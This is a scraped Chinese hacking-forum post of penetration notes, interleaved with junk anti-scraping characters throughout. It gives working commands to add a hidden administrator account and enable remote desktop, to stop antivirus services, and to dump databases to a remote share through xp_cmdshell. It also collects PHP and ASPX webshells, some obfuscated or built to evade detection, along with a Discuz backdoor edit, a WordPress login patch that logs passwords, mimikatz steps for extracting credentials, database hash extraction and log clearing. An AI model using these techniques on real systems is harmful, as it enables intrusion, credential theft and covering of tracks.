: W# s6 c6 C; C" V+ ~# c/h:<height> -- 指定远程桌面屏幕的高度。! y7 D9 |! \+ u& \& L
6 j4 n N# G( K2 a! D J
/edit -- 打开指定的 .rdp 文件来编辑。! P5 {2 q" a6 V. d% _+ a& \
9 y8 T) E. i, h
/migrate -- 将客户端连接管理器创建的旧版& ~. u" {+ n4 T2 {( L) _
连接文件迁移到新的 .rdp 连接文件。 0 ?6 C' Q5 U0 `, _ 7 f# @+ j" c. E 5 z: t# k$ R; Q2 N其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就 # m- ~, Q; \5 d9 U3 d1 k# i. L2 Gmstsc /console /v:124.42.126.xxx 突破终端访问限制数量8 N3 `5 m9 h" \0 D
9 ?6 m" [0 ]' O* I m/ D# b
命令行下开启33897 g$ w0 W0 R& a+ n
net user asp.net aspnet /add8 K5 x, c. w, T3 C) A1 u3 T9 l% R
net localgroup Administrators asp.net /add4 y: P+ ?) L( e: s
net localgroup "Remote Desktop Users" asp.net /add , R% f6 s4 D% l& [' ^attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D$ S! h* m P) o% F6 `" v, s6 A4 C
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0+ N. U/ _% `+ x
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1 / Q! |: ^ h0 o, d' {1 h3 |8 F+ iecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f 1 \2 k, D" I6 [2 {9 dsc config rasman start= auto - O; j5 K5 ~8 Nsc config remoteaccess start= auto 6 q# b- P& g" G. B3 f$ @, o9 Y: d: snet start rasman [. G+ ^& m3 n& v8 m
net start remoteaccess ) x* Y# {, w! q# ?Media ' H: u; j6 \9 A2 n<form id="frmUpload" enctype="multipart/form-data"0 y8 O+ J' E, B9 m$ `" W* x0 U" Y
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>8 f" A/ R/ `8 ~: C& r0 |* f
<input type="file" name="NewFile" size="50"><br> 5 n: h+ m! |$ j& y( Z5 U3 y1 ^: ^<input id="btnUpload" type="submit" value="Upload"> 0 M# j( ^% j l</form>9 o1 V! A8 r- y' b" s
1 t" o1 c5 ?' L. G2 l
control userpasswords2 查看用户的密码 , @! r1 {9 `- N* a/ Vaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径$ y4 Q, N% ^: H! Y1 P* F! `
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a 7 t! R! b. z0 q1 S) }+ B # i/ v' P& ^2 L" Y141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:0 m# ^+ K' I7 t( \2 s& f
测试1:# O. c1 O) z: q3 n4 `
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1 p/ L8 h3 [& D9 K8 {
0 F" b0 j' B3 |' B8 Q2 a" v! \
测试2: 7 f8 [0 M, }5 | 3 s C) h# I3 d$ Ocreate table dirs(paths varchar(100),paths1 varchar(100), id int) 3 X2 t, W4 M/ z! k. S" H& w4 C+ R( E9 ^, |$ d' h4 ?8 \2 ~
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--) w3 O8 X; b" a! K7 U; a; H
6 y5 Y+ z3 b6 a- \ uSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t19 O6 ~ E# r8 O- W* W$ y
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令$ f e/ v0 x) v6 t, z
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制; , e/ n* K4 }% s! e4 N/ wnet stop mcafeeframework$ n5 j7 F" y5 V1 }2 c! U$ U; w
net stop mcshield8 S6 \0 K1 g' G
net stop mcafeeengineservice % a" o+ Q9 e5 s7 S# ^, l/ |, I8 z7 unet stop mctaskmanager: i% S" d0 o2 m: L6 N; R2 P; Q http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D& N" G# a& {: u- t+ E' g* e. |
1 X. K$ A7 j) x5 }3 r- \% m
VNCDump.zip (4.76 KB, 下载次数: 1) + i5 i; u' _$ |* H( Z; I% D密码在线破解http://tools88.com/safe/vnc.php S& h# }, A9 [/ k7 H+ ~/ hVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取- l8 E$ }, w5 L0 b3 r5 _* U
- P% a. q, @) t5 v V$ Z/ r' jexec master..xp_cmdshell 'net user'+ {. H' o$ ?; J
mssql执行命令。 9 T, q4 M+ }5 d) M I获取mssql的密码hash查询. Z& D) l) C# @: \, i: y
select name,password from master.dbo.sysxlogins 8 M; g+ I( R7 a4 Y7 y- q9 @* h* ?2 k' c
backup log dbName with NO_LOG;% I; E6 |9 |% h5 ~8 N. U
backup log dbName with TRUNCATE_ONLY;) j1 _' n) \, v8 E4 G# d
DBCC SHRINKDATABASE(dbName);( Q& l3 J, x; ?7 \0 b5 C
mssql数据库压缩 6 q/ ?2 n# k3 g' r& U1 d 3 s# ]: F; u5 I( L' ]- U/ F# r- K7 mRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK * m% c$ \$ u- Z) Y7 x) ]+ K将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。 0 `& C7 l, @1 P& u o9 u , [4 b" J9 N# W. c x! _backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak' 6 L/ V' }4 e; ]/ Q备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak b! L0 ]) F7 @6 g$ n/ \6 n ( H8 Y" ?+ R# K: Z" v- PDiscuz!nt35渗透要点:+ N x. ?& F1 l) g5 p3 v
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default. D4 x8 j! Q1 }6 ~, Q! _5 {
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>) J% s! o8 r: u; r& n
(3)保存。 8 s3 s% i& d) x+ U; a) C. _) Q$ q(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass 1 [9 @0 E. M- o, Sd:\rar.exe a -r d:\1.rar d:\website\! |1 q2 v( k& O: p- W4 ~; V# S
递归压缩website " Y8 r4 t: c+ ?$ n) b; O注意rar.exe的路径5 @; F& A' p8 R) G8 f8 J1 ^
4 a. ~' H% b7 h
<?php& r' L" b/ \+ R" Y+ l( O- l6 G
- Y5 v% B2 T! J% ^$telok = "0${@eval($_POST[xxoo])}";$ E2 }8 e8 L, P5 i% e F
1 S' U$ J" C' ~9 t% w
$username = "123456";0 a( q8 V B7 G# {8 K
, N, T1 q% F, }4 m1 d2 D% |
$userpwd = "123456"; 2 Y/ U8 r# Z3 K8 A4 p2 S: f6 x+ b, O; ~: c
$telhao = "123456"; ! N: h* s- _3 y4 ^: i0 T5 d! |9 I6 g; N
$telinfo = "123456"; % Q V" p: U; |9 r) l, \3 h+ w" p 1 R& ?' r3 L5 P9 V% a* v9 @$ ]?>, P0 x, u/ H9 g) O' W6 x
php一句话未过滤插入一句话木马 / x, d9 |! E. L' D7 n ' |% I& C. H7 P7 Z) ]站库分离脱裤技巧0 D C- s; V2 B/ I- e* x2 S
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"' 9 ~2 l# j1 G; m" Q% @5 Sexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'. Y" I, W. G3 K% p/ J, B
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。 * B5 l& z; K- S3 @* T9 I这儿利用的是马儿的专家模式(自己写代码)。& |6 k& O& k! K- V0 D: ~
ini_set('display_errors', 1);% ~& k; M# Y" q; q" `
set_time_limit(0); h# [8 o* |! Y
error_reporting(E_ALL);2 ^- R1 f% E1 [! K
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());! v) f& o9 k" i0 I0 K$ m4 Z
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error()); f; H- L2 k% J' L: M1 S
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());+ K5 ]9 U: H+ N3 {# z! y, Q. e& [
$i = 0; ! H( G [4 f; x9 M& c, r! R0 b$tmp = '';7 q- [ w9 t. n
while ($row = mysql_fetch_array($result, MYSQL_NUM)) { : ]( N7 G" y. r8 L# Z $i = $i+1;& O+ ]- v1 g) D* ?5 N$ L$ g
$tmp .= implode("::", $row)."\n";5 T: @% W' }# q
if(!($i%500)){//500条写入一个文件+ I Q: c3 x) T& T+ z! J
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';, e( J/ x" N7 A! `1 s, i4 Y
file_put_contents($filename,$tmp);1 [ U- t% C k: {3 G3 r
$tmp = ''; 3 m7 d7 W5 N, K [ C/ P, F0 ] } ' b" D% Z' z; |' p} ) z' q; V1 q$ P0 T1 T3 z9 y- Cmysql_free_result($result); # s: R5 ~4 R) ~4 U7 q+ P6 L' Q7 N4 D2 w
1 i: s( Y3 Z% z: A
' v: y# R @; h
//down完后delete , Z6 Z. v ~! w) z9 C; k4 k2 D ) \$ A5 l( d ]* L0 o& t T' `# @8 l+ o8 i
ini_set('display_errors', 1);) x/ S- N8 v# l' V' Q& r
error_reporting(E_ALL);9 i" H F4 V0 f4 [/ v- F9 i$ @4 e9 z
$i = 0; 7 n% O% m; w. I4 F6 |# Swhile($i<32) { 7 |1 ^" K$ d8 M$ g2 P( V( t $i = $i+1;4 z9 @1 m) i4 p* s# T
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';4 I" @& P' g! v) ^- W
unlink($filename);! d' n) u; l6 R2 [8 q
} 2 U8 }- q& j, h @6 u8 U h
httprint 收集操作系统指纹/ F0 y" M' Y9 k0 O& x" x
扫描192.168.1.100的所有端口# Z' \" n5 W! c4 v
nmap –PN –sT –sV –p0-65535 192.168.1.100: B: Y& b8 W! e
host -t ns www.owasp.org 识别的名称服务器,获取dns信息 4 Y, D; Y1 m6 w% f" lhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输) j. s1 P1 {/ T: o. T
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host 1 m3 C. ?7 S0 E0 ?7 C2 p+ N& K* ~3 a, L7 U4 o" n5 [- s4 B" k: H0 O# w
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)* t+ I; x+ J: z. W
; W! D" f: s( L" B( S4 d8 Y2 c MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号) $ g8 r* z' V% R7 u8 b ) E) Z5 [5 N5 m( j, A: ~2 @ Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x & v2 g! P$ @! K8 \0 X4 o9 X! c4 C+ [8 s
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)# N. E v- i5 m4 R
9 ]0 C/ z" q& _& h4 B+ e- m3 z http://net-square.com/msnpawn/index.shtml (要求安装) / G. T9 O1 n! U$ J8 Z" W0 [8 o* `/ d0 U0 t/ h: G
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的) + v" F2 R2 a2 y1 ]7 q9 y6 j% Z7 E6 T$ x
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找) 8 E, b5 J5 M: z9 \* Pset names gb23128 Y% \# g7 H2 `& g# k
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。 , @& i0 v r# h1 s& m0 e9 A: T. ^/ h' M, E( z/ |, J
mysql 密码修改 , K6 k) n8 X' E: j0 gUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” ! |; d) ]! Y% f( zupdate user set password=PASSWORD('antian365.com') where user='root';& U+ F3 J! I* n9 T) @
flush privileges; : b& R3 |- t8 B6 C高级的PHP一句话木马后门 ( e) {3 h! y" i) H- p( d/ d* g7 Z# m! {# w- w/ a7 m- V
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀, z# [7 F3 j# h6 O, Y# }
* {4 @6 C, y" g; [& R1、 , { V9 b a* S! r4 r- y% R; ?5 Z8 p* V$ v0 G
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; 3 i" m0 k: g. j1 z/ B 4 |# p `5 c; ^% \3 b1 c7 C$hh("/[discuz]/e",$_POST['h'],"Access"); " k( V: T4 `; S7 q7 H7 s6 T" |8 E7 c. {! |0 @5 k# \
//菜刀一句话 ' w a8 h# {& ~. f. {! ?. r1 N y0 T& E/ G/ F$ K; G% T# z
2、 2 U4 d. D9 _. K% F; l ( N3 E; T6 p5 S0 k% T; `$filename=$_GET['xbid'];5 ~7 ?, J$ ~) N- E- ~; j
& x" E7 B1 X5 p) s3 @include ($filename);6 v% S# `) q# i3 i) }6 T, f' `
( j- S, D7 F# w3 H0 f7 e
//危险的include函数,直接编译任何文件为php格式运行" b: Z( Q9 A( M5 x. h
) f6 z% W" ^6 ^3 P) W
3、 4 b' ]( }9 g7 G H . V' H8 G4 }: G8 M$reg="c"."o"."p"."y";8 U" \% V7 [0 y& s
9 c5 [# U1 {% d9 y' @* k! {
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); 5 s( {0 [. F+ I- q5 y 6 @1 r7 @: _! v* h! r! ]//重命名任何文件2 j) S# K! d" w3 Z2 I
$ t- I5 q6 E: V8 d. t9 Q$ ^2 |7 c4、 3 y+ J( A5 W6 A ' h4 z8 ^0 }4 K$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; % ^- M; L* A6 f" S& O( D 1 c0 M$ A7 L! V i! X$gzid("/[discuz]/e",$_POST['h'],"Access");) ~8 R: O7 t$ e r5 b& S' `
' y; `# b& I3 d
//菜刀一句话 " J, g% c9 J; R( |1 ? 1 i5 b/ q( z% }8 D3 T# m5、include ($uid);. X1 F; a" g# b, g1 n+ ~1 A# @! t2 q9 H
+ I) I" L8 M' X8 d2 b7 o; y1 Q; h
//危险的include函数,直接编译任何文件为php格式运行,POST @+ o/ l, s3 u i, O y
# z$ c) V# Q$ H! O# z% I8 \9 i9 W0 `* u; k/ g
//gif插一句话 ' ?4 q& [( E# T4 U2 M" Z! F. V& D U4 I- b5 I
6、典型一句话 # T, Q, t3 O- J( T+ s' d ) O3 m% D9 Z' O; g8 s程序后门代码 ( R9 {) D( V9 g0 S1 b8 j<?php eval_r($_POST[sb])?>( u' B! @0 x4 G4 l
程序代码 + {* W. Y. a Q, K7 n<?php @eval_r($_POST[sb])?> ! a6 H8 v2 _* x% v2 m2 z9 g//容错代码 - z) e. V2 U1 E6 L7 a9 T3 J( e程序代码8 ]5 M, l; c+ Y7 P# k( v7 G: k
<?php assert($_POST[sb]);?>+ k" e5 R" e! ~0 K
//使用lanker一句话客户端的专家模式执行相关的php语句# { R& T3 o9 y$ o3 P1 i
程序代码0 y" T% e3 ?9 U( |7 j
<?$_POST['sa']($_POST['sb']);?> , ?& |' s: f) }' n3 [- o* G# S q( l程序代码 ! |, C! }2 j! c- b, b<?$_POST['sa']($_POST['sb'],$_POST['sc'])?> % Z% e3 L+ x; Q1 Q+ s8 |# ]1 |程序代码 I: A# e. F; O2 D2 |( h* r8 a<?php : G5 b) O( E5 j6 f- ?# V@preg_replace("/[email]/e",$_POST['h'],"error");: h) y, y( Y; q2 f$ w
?> 8 ?- i$ f/ b8 b9 N//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入0 J: V0 V2 |# ^" r7 ?6 \/ F$ S
程序代码 4 t" v: _8 F4 d! Z& w2 E" F2 N<O>h=@eval_r($_POST[c]);</O>1 b2 j. n' r5 G$ p9 y
程序代码 , O$ ^( T/ u" c<script language="php">@eval_r($_POST[sb])</script> 9 j+ A( p9 q2 ]! H- Z& i5 v//绕过<?限制的一句话( L& c. \* E9 W" P _' C* g
+ Y7 L7 Z) J8 @4 y http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip 7 U' P$ ~8 R0 s3 f5 d& A; \4 z详细用法:/ R. F$ i7 j- B9 k0 U
1、到tools目录。psexec \\127.0.0.1 cmd 9 B( _; Y1 H i7 z7 G2、执行mimikatz3 I, c$ R! q- ^+ G
3、执行 privilege::debug ; A- p: I4 |% l0 b- g0 }4、执行 inject::process lsass.exe sekurlsa.dll. j4 W8 ^1 M# c& p: g
5、执行@getLogonPasswords/ Y4 S+ @+ K( r& O4 f- F
6、widget就是密码- ~$ F. U9 z; e: S; |
7、exit退出,不要直接关闭否则系统会崩溃。 - x" ~6 m4 }9 i4 \( T6 H* v 2 e$ ]( q1 @$ U9 C2 F* A1 R' fhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面 " P' u O3 c+ I9 w X4 o( J$ J) O- [ s1 i) ?+ C
自动查找系统高危补丁6 y* t7 |2 M' |! F4 ]% O
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt # ]. Z3 M+ a* a4 U( }* U' @ / L' z5 D$ Q8 `) T( A突破安全狗的一句话aspx后门 & h* f4 ^" @: b1 B) v<%@ Page Language="C#" ValidateRequest="false" %>5 I7 G: d+ O# h
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%> / ^5 ?* X' O$ B" n0 Pwebshell下记录WordPress登陆密码 9 L, c# E7 A. h- w. L( Jwebshell下记录Wordpress登陆密码方便进一步社工+ h) D% t _& g7 S
在文件wp-login.php中539行处添加:5 c& e' N7 q3 y) `2 b
// log password% A t- }7 ~2 J
$log_user=$_POST['log']; g9 o0 m$ R0 U" a2 V
$log_pwd=$_POST['pwd'];9 W- |. y3 v5 a! i. N9 z2 U
$log_ip=$_SERVER["REMOTE_ADDR"];& g) X6 `" q+ q6 v
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip; 3 k8 ~+ M" z' V& n7 S$txt=$txt.”\r\n”; / D: t9 Y3 ?, o% I n, b$ A* Jif($log_user&&$log_pwd&&$log_ip){ ; w# B/ f# Q* K# ]0 R" o@fwrite(fopen(‘pwd.txt’,”a+”),$txt);# I" p5 [3 r! c
} v( F0 l# c7 W+ K, Q9 f, ]- _当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。# e/ S9 k- {4 l6 q% c, x
就是搜索case ‘login’ / i4 X1 W, r) i- p) U+ k- A, j: }# `在它下面直接插入即可,记录的密码生成在pwd.txt中," G- a4 }0 s I. z5 B
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录; f) H. J+ P' d3 R
利用II6文件解析漏洞绕过安全狗代码: ( U7 K& r* Q0 G0 r' w;antian365.asp;antian365.jpg6 v/ a0 ?, N, T2 ]% M8 F. \
$ @+ \4 D: Y: Y3 b9 O) a7 j( a各种类型数据库抓HASH破解最高权限密码!) H4 ]# P7 G$ c
1.sql server2000' }' R! n4 d+ v: s$ b* D
SELECT password from master.dbo.sysxlogins where name='sa' + d7 G4 o% j: \1 W; ? T# \0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341 / i0 ?1 W# p2 |6 ~2FD54D6119FFF04129A1D72E7C3194F7284A7F3A 0 o! Y5 N$ N& s# y; J - I7 D; N8 M- F: {8 a1 o# O0×0100- constant header! Y" e3 R7 T( g' {; f" k
34767D5C- salt ' z: j2 j9 Z; ]8 ?: o* t ~( o0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash% ?+ L* o1 k6 e( F; q8 a& |% f
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash8 b7 Q1 r4 f A" y7 W U E
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash 1 r s# r3 e8 M/ [( ]SQL server 2005:-9 ], c6 s5 Q0 R3 T
SELECT password_hash FROM sys.sql_logins where name='sa'# m+ y$ h7 Y* L; P
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F5 V9 f* p" C8 U; L1 R/ I
0×0100- constant header* Q, Q- o: W) E: K2 u% l* w* Z1 u
993BF231-salt + Z. g- _. w+ [$ K' H5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash ; t9 w3 M9 P ^, {1 \2 m3 X8 l7 ucrack case sensitive hash in cain, try brute force and dictionary based attacks. & @$ H" Q0 S5 o |. T3 M6 r1 | Q: _& b' D- |# U* U* j
update:- following bernardo’s comments:- - E7 k* o6 t$ b" l0 Cuse function fn_varbintohexstr() to cast password in a hex string. * d! X: |' {3 ce.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins! K7 b) `4 G6 u, z6 [9 G
2 W+ j a% D, V% ]- g8 B
MYSQL:- & z0 s) r! o: H5 E 1 v- d; R( t* R0 ~" ^In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.( L/ c: N% {8 n, P/ d
3 m: s* T9 }* W
*mysql < 4.18 G$ z3 O5 _( u6 i0 Z/ K
+ r9 b: g3 L, A4 ?7 I; P
mysql> SELECT PASSWORD(‘mypass’);5 P, {% H: j0 H; {
+——————–+, T! v; S. |5 v/ t
| PASSWORD(‘mypass’) |2 C" j: ?; [; e8 P8 e
+——————–+ 5 e( {# Y: z. X$ y% Z! t5 H| 6f8c114b58f2ce9e | ]1 i) Q" V& S# `5 h1 y! n
+——————–+ 2 v+ m7 h' z1 T6 M4 }1 e; B9 j+ u " Z+ `2 A( i2 ?*mysql >=4.1/ @' I$ N$ u3 v* p
: l9 j4 q0 ~9 J9 ~' h+ }( d
mysql> SELECT PASSWORD(‘mypass’); 7 \; k5 Y7 }% X0 {9 ~/ w+——————————————-+ & u% R7 m% E( r8 i" E| PASSWORD(‘mypass’) | * Z# P, y2 l, N1 _& K7 W* Z: |+——————————————-+" `% m5 H& H0 S Q" V
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 | 4 x" p( O( |8 Y: p. r+——————————————-+ 6 d0 l6 F, f1 y6 T - Y. s+ X5 ]4 E: P3 C3 q7 S% iSelect user, password from mysql.user 7 D0 N4 u B' G5 aThe hashes can be cracked in ‘cain and abel’ 5 Z1 h" u* D# N) j/ `* t# P$ p2 S. ^* D/ k
Postgres:- 8 B0 f/ |# I( S2 o6 hPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)+ S j7 B/ T$ A2 i- f; q
select usename, passwd from pg_shadow;" c, R, G2 s4 V1 J5 K6 ?' m
usename | passwd. H- R- ]1 E2 g6 z
——————+————————————- " ~8 J1 O) I9 X& i: q+ C0 W& I7 Qtestuser | md5fabb6d7172aadfda4753bf0507ed43961 u1 I1 D6 }5 j: e
use mdcrack to crack these hashes:- # p8 ^5 f. q0 r' ]5 Y! s2 j: A. t$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396# w. t8 F8 x8 a; f
1 {- x- H% s- X; F2 {Oracle:- : k1 t$ v( v, I: u, q z* y3 b/ i, uselect name, password, spare4 from sys.user$& `3 j! D+ h* O( c, T
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g/ P, a. \& @0 p4 ]
More on Oracle later, i am a bit bored…. h7 b7 Q3 M) I
4 \0 L0 h& C" w7 h; I c$ U Y9 N8 }7 ]) q0 `; R
在sql server2005/2008中开启xp_cmdshell6 U& L6 Q+ |. O" v* ^
-- To allow advanced options to be changed. 3 T# p4 b$ N) fEXEC sp_configure 'show advanced options', 12 g7 g& x1 G" y. Z- @2 h- u2 p7 d
GO8 m2 U3 Q4 n: M2 Y% K0 `$ ]
-- To update the currently configured value for advanced options. + t# E* b6 t- h( |RECONFIGURE% W) `/ m6 R" W/ F& A# u! J( R
GO0 ~% H: d# x( G; k0 ]
-- To enable the feature.& Y% y4 p( Q! ^$ x2 D
EXEC sp_configure 'xp_cmdshell', 1 ( b% `% ]- K7 A% @* {GO. i8 P5 B0 l$ n8 P) q. x
-- To update the currently configured value for this feature.4 L( J9 c6 L7 q- ~9 o
RECONFIGURE% m5 E# {$ ~2 d, E p5 _+ Y9 M
GO0 ~- S. R! ]* G9 s5 {% k
SQL 2008 server日志清除,在清楚前一定要备份。 ; m; E+ ?+ g+ M1 @* E5 @如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除: 4 R1 c% A/ _9 x$ R! n; WX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin q* } f3 T i
9 A* h# E3 }; I$ ^) n# T% u
对于SQL Server 2008以前的版本: 8 h0 A% r' Y- A* iSQL Server 2005:- l" M7 |' g& K( J
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat. M9 f" J: Y9 A" ~1 j5 V
SQL Server 2000: # u; K7 Y" _: Q A. e清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。 6 _: k6 b' C6 ?# G" h Q6 p$ q9 [% x# \9 X& t
本帖最后由 simeon 于 2013-1-3 09:51 编辑# h2 b7 {* o# ]. r$ q3 L
% [% e4 i8 O Y% G5 k T M
; D2 u4 q p y- n4 t
windows 2008 文件权限修改 0 u2 W( I6 m- X; P1 G1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx( K6 }" P! x! ~0 c3 f, {
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98; O2 M8 o. V) r) U. y( t7 b3 `
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”," B6 g* Y" O) F, ?; |: Q0 a